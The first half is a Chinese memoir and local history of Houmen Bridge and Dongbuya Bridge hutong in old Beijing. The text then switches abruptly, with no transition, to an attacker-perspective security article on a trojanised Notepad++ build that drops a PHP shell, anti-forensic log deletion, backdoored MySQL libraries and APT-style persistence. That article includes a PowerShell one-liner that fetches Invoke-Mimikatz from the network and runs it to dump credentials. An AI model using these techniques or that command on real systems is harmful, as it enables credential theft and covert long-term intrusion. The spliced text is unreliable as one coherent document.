后门桥

后门桥是京城老城区内的一座石桥，目前依然健在。东不压桥也曾是老北京城内的一座桥，离后门桥很近，虽然早已不在，但依然有一条以这座桥命名的胡同。

老汉我1957年出生在京城的帽儿胡同，并在此居住了25年。我们这条胡同的东口，是如今名声远扬的南锣鼓巷，西口是地安门外大街。我很小就记得胡同西口有一座桥，叫后门桥。离我家最近的公交车站就叫后门桥。这座桥再往西，又是京城另一个著名地标——什刹海。

长大后得知，这后门桥的大名叫万宁桥，历史悠久，大名鼎鼎。很久很久以前，什刹海只有东南部一个出水口，流出的水道称为玉河，从后门桥下向东南方向流去，经过现在的平安大街，继续向东流去。当时，这里有一座桥叫东步量桥。明代，为解决北海和中南海的水源，打开了什刹海与北海的通道。在今天北海幼儿园大门稍北处平安大街的位置上，修建了一座桥，叫西步量桥。明代改建北京城时，将皇城北墙和东墙向外扩展，结果把西步量桥压住了一部分，而东边的东部量桥没有压上，人们就把这两座桥叫成了“东不压桥”和“西压桥”。1955年，玉河河道被改为暗沟，东不压桥被拆除了，留下的桥拱被埋入了地下。所以，我们这些1955年以后出生的人，都没有见到这条水系。

东不压桥虽然看不到了，但因东不压桥而得名的东不压桥胡同却一直保留了下来。顺着早年的河道、后来的暗沟延伸，便有了东不压桥胡同。实际上，在玉河基础上形成的东不压桥胡同是分为东西两个部分的，河西叫东不压桥胡同，河东叫东不压桥东胡同，多了一个“东”字。两个部分都不长，大致都是南北走向，通到当年的地安门东大街、也就是今天的平安大街上。

从老汉我居住的帽儿胡同，无论是到后门桥还是到东不压桥，都只需5分钟不到的时间。我的中学时代，按片划校，我被分配到地安门中学。校址位于今天地安门十字路口东侧路北，现在已经成为5中分校。当年上学，穿行“河”西的东不压桥胡同，是一条最快的捷径。我们每天都要走两个来回。但这条不长的胡同里住户稀少，还要拐几个死角。所以，要是天黑下来，还真有点儿恐怖，总怕拐弯处藏着个打家劫舍的。有人从对面走过来，也往往是麻杆儿打狼，两头害怕。我们这些初中生，有时成群结队在黑暗的胡同里穿行，为了壮胆，还总爱大声怪叫，貌似

想吓唬别人，却往往先自己吓唬了自己。

我有一个小学同学住在东不压桥胡同。那是一个部队的宿舍，对面就是地安门中学最靠里面的教室。当年，我们常在他家上学习小组，还在院里捉迷藏。而教室下面有几个小洞，从洞里可以看到中学生们的脚。于是，我们这些小学生中有几个淘气的，常常往洞里扔石子。有一次，砸了女中学生的脚，她们叫来男生，从窗户里伸出长长的竹竿，把同学那个院房顶上的瓦片挑下来好几块，以示报复。那时，打假斗殴是学生间常有的事情，就像电影《老炮儿》中展示的，叫做“茬架”。

因为老汉我多年来经常重返故地，所以目睹了从后门桥到东不压桥的工程持续、反复了大约10余年。建国60周年的时候，玉河通水的消息见诸报端。“十一”那天，老汉我从天安门步行来到这里，目睹了河水穿街过巷、不是江南、胜似江南的美景。

此后，玉河河道及两岸的工程又延续了数年。为了保持水质，在河道内铺设了防水毯防渗隔离，并安装了水循环系统，每6天循环一次。时至今日，连接后门桥和原东不压桥、东靠南锣鼓巷、西与什刹海隔街相望的玉河，终于又在平安大街旁打造了“水穿街巷”的景象。两岸明清风格的围墙、院落沿河而建，花窗、朱门、石檐点缀其上，堤岸两侧树木掩映，堤下河水蜿蜒而过。

在玉河由东西转为南北走向的那一段，东西两岸的一些建筑上仍偶尔可见东不压桥胡同的字样。有看似单位大院的东不压桥37号，还有过去常去的小学同学家41号；有似乎还在等待拆迁，在围墙上临时标出门牌号的东不压桥28号；还有新建的仿古建筑福祥社区所在地东不压桥胡同12号。而除此之外，确再也找不到其他标有东不压桥的门牌号了，标有东不压桥东胡同的院落则一个也没有，与这三个院落相连的许多新建的已经有人居住和看上去尚无人居住的院落，都没有具体的门牌号。

我曾经向一位牵着两条小狗的大爷询问，这些院落都是哪条胡同的啊？大爷说：东不压桥啊！倘真如此，有关部门是不是应该尽快把门牌号安上啊？到那时候，老汉我是一定会再次故地重游的。

（此文曾载于2016年6月30日、7月7日《中国电视报》）

有桥的地方，历来多有市场。更何况后门桥在鼓楼商业街上的位置特殊。

北京商业界的老人们曾说，北京城传统商业街上，大多有一种叫“阴阳街”的现象。今天，在鼓楼商业街上，还依稀能看得出来。或者，这里是老商街“阴阳街”现象的硕果仅存了。其表现为：由北向南，从鼓楼前到地安门外大街南口，

人们的行走，先是靠路西侧(地安门商场一侧)，明显的人流量高于路东侧，尽管街东也是店铺鳞次栉比；及到后门桥，似乎是有着某种“默契”，人们大多折到

路东去了，直到街的南口。若从地图上看，后门桥的位置，大体处于鼓楼商业街(地安门外大街)的黄金分割点。

后门桥曾是鼓楼商业街上的商业漩涡点。不但是店铺的漩涡，还是摊贩市场的漩涡。

后门桥北，火神庙旁，面对面的是灌肠铺合义斋、福兴居，谦祥益北号也在桥北，桥南有天汇轩大茶馆、品古斋等。

上世纪二十年代中期至四十年代，后门桥一带，还曾有个“桥儿满”。

“‘桥儿满’是满姓回民在后门桥一带经营牛羊肉、饭馆等商户的统称。大约在三、四十年代，是‘桥儿满’最兴旺的时候。‘庆升祥’是‘桥儿满’开的第一家字号，在桥儿北路西，以经营鲜牛羊肉为主，兼营烤肉、烧羊肉。‘庆升祥’老掌柜叫满春青，字瑞恒。以后又在桥南相继开了‘瑞成号’、‘金和祥’和桥北的‘北庆升祥’”。

“‘桥儿满’的羊肉片儿，因选料精、手工鲜切而出名，是帽儿胡同、白米斜街、秦老胡同等大宅门吃涮肉的首选”。“桥儿满”的烤肉、烧羊肉和烧饼，尤为京剧界人士和戏迷们所喜好。他们清晨在什刹海练功后，必到“庆升祥”。“在经历了日伪时期的萧条和解放前夕的动荡，‘桥儿满’逐渐萎缩，解放以后几乎被人忘记了。”(满恒先：“后门桥与‘桥儿满’”，北京西城档案馆《西城追忆》网刊第18期)

图　古老的后门桥　

后门桥一带还有书摊、风筝摊等。

《天咫偶闻》卷四“北城”中云：“地安门街西有火神庙，……寺前有卖书人赵姓，时得故家书出卖”。在这个书摊上，震钧说不时能看到些名人大家的藏书。此外，他还看到其他零星小品，如印章等，“皆内城旧家童仆所窃，妇孺所弃之物”。

火神庙前还有风筝摊儿。北城著名的“风筝金”，曹(雪芹)氏风筝传人金福忠，民国时就曾在火神庙外以摆摊儿卖风筝为生(梁季兰“风筝往事”，《北京晚报》， 2007年4月15日)。1996年时，我拜访北京风筝名家王郁璋先生，他告诉我：“小时候，我家在鼓楼西拈花寺附近。那时，金福忠先生就在火神庙（今地安门后门桥路西）摆摊卖风筝。他是满族人，从姓上看，人说他不是正黄就是镶黄旗，和皇上沾亲。据说他家三代作风筝，还专门给宫里送。有人说他卖不完的风筝，就都背到故宫东门，交管事的内差。等到上了帐，钱就给他拨来了。故宫里现在还藏有当年他给皇上作的风筝，证明此说不假。我小时总买他作的‘黑锅底’、‘龙睛鱼’，那会儿真是喜欢得夜里睡不着。至今想起来，那风筝的样子还真真的，如在眼前。”

火神庙前，书摊一定不只赵姓一个。鼓楼、什刹海多有仕宦名家，从他们的手中淘到古籍旧物的，也绝不会只赵姓一人。估计还会有其他书摊及纸笔砚墨等摊档。

同样的道理，既然有金福忠先生的风筝摊儿，就还可能有其他民间玩好的摊档等，如鸟笼子、蛐蛐罐、蝈蝈笼、葫芦等等。

风筝摊·民国北京街头商贩旧照

民国初年，后门桥还曾是清善扑营跤术的表演场。

据北京西城档案馆《西城追忆》网刊所载李宝如先生《摔跤鬻艺始末》一文，“民国初年右翼御扑户王三（肉包子）在鼓楼前、什刹海设场卖药（江湖称‘挑汉’），拿两件跤衣（褡裢）招揽观众，讲一些宫廷趣闻、善扑营轶事等，开始收入颇丰，后来人们听膩了，生意一天不如一天。王三找失业在家住闲的御扑户熊万泰（熊德山之父），请其来场共同摔跤卖药，熊万泰欣然同意搭伙干买卖。从此，每天在后门桥一带摔跤卖药。观众白看摔跤，每天人山人海，摔跤表演历来有之。他们研究编撰了一些套路，配合严谨默契，观众百看不厌。后又有晚清善扑营瑞钢达、何汉山、立铁良（铁三）、万老等常到跤场帮场。”

“近代摔跤撂地鬻艺创于晚清扑户。民国初年，御扑户皆各谋生路，殷实者经商，大部分以身为业出卖苦力。开馆授徒、设场卖艺者有之。他们这些人维持了生活，传播了跤技。著名评书演员连阔如在《江湖丛谈》中写到：‘摔跤的这种功夫是我国国粹的一种武术，至今没有失传，亦是摔跤撂地的人们能保存国粹的一种功劳。使各界人士知道有这类武术，实是他们的好处。如若没有他们这些人干这行儿，不用说保存这种技能，提倡这种武术，亦恐无人道及了’。”

清末善扑营摔跤高手合影

二十世纪五十年代，以北京跤术为基础的中国式摔跤成为国家正式竞赛项目。如此说来，后门桥还是中国式摔跤的发源地。

这次继续围绕第一篇《第一季从攻击者角度来对抗》做整理与补充。在深入一步细化 demo notepad++。

后门是渗透测试的分水岭，它分别体现了攻击者对目标机器的熟知程度，环境，编程语言，了解对方客户，以及安全公司的本质概念。这样的后门才能更隐蔽，更长久。

而对于防御者需要掌握后门的基本查杀，与高难度查杀，了解被入侵环境，目标机器。以及后门或者病毒可隐藏角落，或样本取证，内存取证。.

所以说后门的安装与反安装是一场考试，一场实战考试。

正文开始

这里要引用几个概念，只有概念清晰，才能把后门加入概念化，使其更隐蔽。

1：攻击方与防御方的本质是什么？

增加对方的时间成本，人力成本，资源成本（不限制于服务器资源），金钱成本。

2：安全公司的本质是什么？

盈利，最小投入，最大产出。

3：安全公司产品的本质是什么？

能适应大部分客户，适应市场化，并且适应大部分机器。（包括不限制于资源紧张，宽带不足等问题的客户）

4：安全人员的本质是什么？

赚钱，养家。买房，还房贷。导致，快速解决客户问题（无论暂时还是永久性解决），以免投诉。

5：对接客户的本质是什么？

对接客户也是某公司内安全工作的一员，与概念 4 相同。

清晰了以上 5 个概念，作为攻击者，要首先考虑到对抗成本，什么样的对抗成本，能满足概念 1-5。影响或阻碍对手方的核心利益。把概念加入到后门，更隐蔽，更长久。

文章的标题既然为 《php 安全新闻早八点》，那么文章的本质只做技术研究，Demo 本身不具备攻击或者持续控制权限功能。

Demo 第二代：

Demo 环境：

windows 7 x64，notepad++(x64)

Demo IDE：

vs2017

在源码中，我们依然修改每次打开以 php 结尾的文件，先触发后门，在打开文件。其他文件跳过触发后门。

但是这次代码中加入了生成 micropoor.txt功能。并且使用 php 来加载运行它，是的，生成一个 txt。

demo 中，为了更好的演示，取消自动 php 加载运行该 txt。

而 txt 的内容如图所示，并且为了更好的了解，开启文件监控。

使用 notepad++(demo2).exe打开以 php 结尾的 demo.php，来触发 microdoor，并且生成了 micropoor.txt

而 micropoor.txt内容：

配合 micropoor.txt 的内容，这次的 Demo 将会变得更有趣。

那么这次 demo 做到了，无服务，无进程，无端口，无自启。

根据上面的 5 条概念，加入到了 demo 中，增加对手成本，使其更隐蔽。

如果 demo 不是 notepad++，而是 mysql 呢?

用它的端口，它的进程，它的服务，它的一切，来重新编译 microdoor。

例如：重新编译mysql.so,mysql.dll，替换目标主机。

无文件，无进程，无端口，无服务，无语言码。因为一切附属于它。

这应该是一个攻击者值得思考的问题。

正如第一季所说：在后门的进化中，rootkit也发生了变化，最大的改变是它的系统层次结构发生了变化。

6:线索排查与反线索排查

那么这个 demo 离可高级可持续性渗透后门还有一段距离，这里引入第六条 “线索排查” 与 “反线索排查”，在之前的 demo 中，它生成了一个名为 micropoor.txt的文件，如果经验丰富的安全人员可根据时间差来排查日记，demo 的工作流程大致是这样的，打开 notepad++，生成micropoor.txt，写入内容，关闭文件流。根据线索排查，定位到 notepad++，导致权限失控。

在线索排查概念中，这里要引入“ABC”类线索关联排查，当防御者在得到线索A，顺藤到B，最后排查到目标文件 C，根据五条中的第一条，demo 要考虑如何删除指定日志内容，以及其他操作。来阻止 ABC 类线索关联排查。

不要思维固死在这是一个 notepad++ 后门的文章，它是一个面向类后门，面向的是可掌握源码编译的类后门。同样不要把思维固定死在 demo 中的例子，针对不同版本的 NT 系统，完全引用

powershell IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz

而关于 bypass UAC，已经有成熟的源码。或发送至远程或是写在本地的图片里，不要让知识，限制了后门的想象。

这也正是之前所说的：一个优秀的 Microdoor 是量身目标制定且一般不具备通用性的。是的，一般不具备通用性。

观看目前文章的一共有 2 类人，一类攻击方，一类防守方。

假设一个场景，现在摆在你面前有一台笔记本，并且这台笔记本有明确的后门，你的任务，排查后门。我想所有人都会排查注册表，服务，端口，进程等。因为这些具备通用性，也同样具备通用性排查手段。

临近文章结尾，第三次引用：在后门的进化对抗中，rootkit 也发生了变化，最大的改变是它的系统层次结构发生了变化。

如果彻底理解了这段话。那么就要引用王健 X 爸爸的一句话：先定个小目标，控它个 1825 天。

奈何厂商不重视后渗透攻击与持久性攻击，文章的结尾引用马 X 爸爸的一句话：

厂商不改变，我们就改变厂商。

总结

这里的内容作为一个过渡，过渡后门在对抗升级中由传统后门，衍生成锁定目标的制定后门。引用百度百科的“后门程序"的相关解释：

安全从业人员，其实至少一直在与传统后门对抗，比如最常见的 webshell 免杀与 webshell 过 waf。

应急中的样本取证查杀远控残留文件等。但是 webshell，远控仅仅又是 “backdoor” 的其中一种。

这里按照之前的风格继续引用几个概念，只有概念清晰，才能了解如何对抗。

1：安全从业人员为什么要了解后门？

防御是以市场为核心的，而不是以项目为核心。需要对抗的可能是黑产从业者的流量劫持相关后门，或者是政治黑客的高持续渗透权限把控后门等。

2：攻击人员为什么要了解后门？

随着对抗传统后门的产品越来越成熟，由特征查杀，到行为查杀，到态势感知。到大数据联合特征溯源锁定，如何反追踪，是一个非常值得思考的问题。

3：后门与项目的关联是什么？

某项目，被入侵，应急并加固解决，若干天后，再次被入侵依然篡改为某博彩。导致安全从业人员，客户之间的问题。

4：后门与安全产品的关联是什么？

某客户购买某安全产品套装，在实战中，一般由非重点关注服务器迂回渗透到核心服务器来跨过安全产品监控，得到相关权限后，后门起到越过安全产品。它会涉及对其他附属安全产品的影响。如客户质疑：为什么我都买了你们的套装，还被入侵。并且这还是第二次了。

思维跳出以上 4 条，来看下进一年的部分相关安全事件：

思维跳出以上4条安全事件，这里再一次引入百度百科的APT的主要特性：

1、潜伏性：这些新型的攻击和威胁可能在用户环境中存在一年以上或更久，他们不断收集各种信息，直到收集到重要情报。而这些发动APT攻击的黑客目的往往不是为了在短时间内获利，而是把“被控主机”当成跳板，持续搜索，直到能彻底掌握所针对的目标人、事、物，所以这种APT攻击模式, 实质上是一种“恶意商业间谍威胁”。

2、持续性：由于 APT 攻击具有持续性甚至长达数年的特征，这让企业的管理人员无从察觉。在此期间，这种“持续性”体现在攻击者不断尝试的各种攻击手段，以及渗透到网络内部后长期蛰伏。

3、锁定特定目标：针对特定政府或企业，长期进行有计划性、组织性的窃取情报行为,针对被锁定对象寄送几可乱真的社交工程恶意邮件，如冒充客户的来信,取得在计算机植入恶意软件的第一个机会。

4、安装远程控制工具：攻击者建立一个类似僵尸网络 Botnet 的远程控制架构，攻击者会定期传送有潜在价值文件的副本给命令和控制服务器 (C&C Server) 审查。将过滤后的敏感机密数据，利用加密的方式外传。

一次针对特定对象，长期、有计划性渗透的本质是什么？

窃取数据下载到本地，或者以此次渗透来达到变现目的。

引用如图：

一次具有针对性的渗透，绝对不单单是以渗透 DMZ 区为主，重要资料一般在内网服务器区（包括但不限制于数据库服务器，文件服务器，OA 服务器），与内网办公区（包括但不限制于个人机，开发机，财务区）等。而往往这样的高级持续渗透，不能是一气呵成，需要一定时间内，来渗透到资料所在区域。而这里其中一个重要的环节就是对后门的要求 ，在渗透期间内（包括但不限制于一周到月甚至到年）以保持后续渗透。

传统型的后门不在满足攻击者的需求，而传统型的木马后门，大致可分为六代：

第一代是最原始的木马程序。主要是简单的密码窃取，通过电子邮件发送信息等，具备了木马最基本的功能。

第二代在技术上有了很大的进步，冰河是中国木马的典型代表之一。

第三代主要改进在数据传递技术方面，出现了 ICMP 等类型的木马，利用畸形报文传递数据，增加了杀毒软件查杀识别的难度。

第四代在进程隐藏方面有了很大改动，采用了内核插入式的嵌入方式，利用远程插入线程技术，嵌入 DLL 线程。或者挂接 PSAPI，实现木马程序的隐藏，甚至在 Windows NT/2000 下，都达到了良好的隐藏效果。灰鸽子和蜜蜂大盗是比较出名的 DLL 木马。

第五代驱动级木马。驱动级木马多数都使用了大量的 Rootkit 技术来达到在深度隐藏的效果，并深入到内核空间的，感染后针对杀毒软件和网络防火墙进行攻击，可将系统 SSDT 初始化，导致杀毒防火墙失去效应。有的驱动级木马可驻留 BIOS，并且很难查杀。

第六代随着身份认证 UsbKey 和杀毒软件主动防御的兴起，黏虫技术类型和特殊反显技术类型木马逐渐开始系统化。前者主要以盗取和篡改用户敏感信息为主，后者以动态口令和硬证书攻击为主。PassCopy 和暗黑蜘蛛侠是这类木马的代表。

以远控举例，远控最开始生成的 RAT 功能一体化（包括但不限制于文件传输，命令执行等），后衍生成生成 RAT 支持插件式来达到最终目的。

以上的几代包括以上远控共同点，以独立服务或者独立进程，独立端口等来到达目的。难以对抗目前的反病毒反后门程序。

那么传统型后门权限维持就不能满足目前的需求。

以 Demo 第二代举例，它无自己的进程，端口，服务，而是借助 notepad++（非 dll 劫持）来生成 php 内存 shell（这个过程相当于插件生成），并且无自启，当服务器重启后，继续等待管理员使用 notepad++，它属于一个 AB 链后门，由 A-notepad 生成 B-shell，以 B-shell 去完成其他工作。如果继续改进 Demo，改造 ABC 链后门，A 负责生成，B 负责清理痕迹，C 负责工作呢? 这是一个攻击者应该思考的问题。

而后门的主要工作有 2 点：

1、越过安全产品。

2、维持持续渗透权限。

文章的结尾，这不是一个 notepad++ 的后门介绍，它是一个 demo，一个类后门，一个具有源码可控类的后门。

本文作者：micropoor

作者博客：https://micropoor.blogspot.hk/

文章出处：信安之路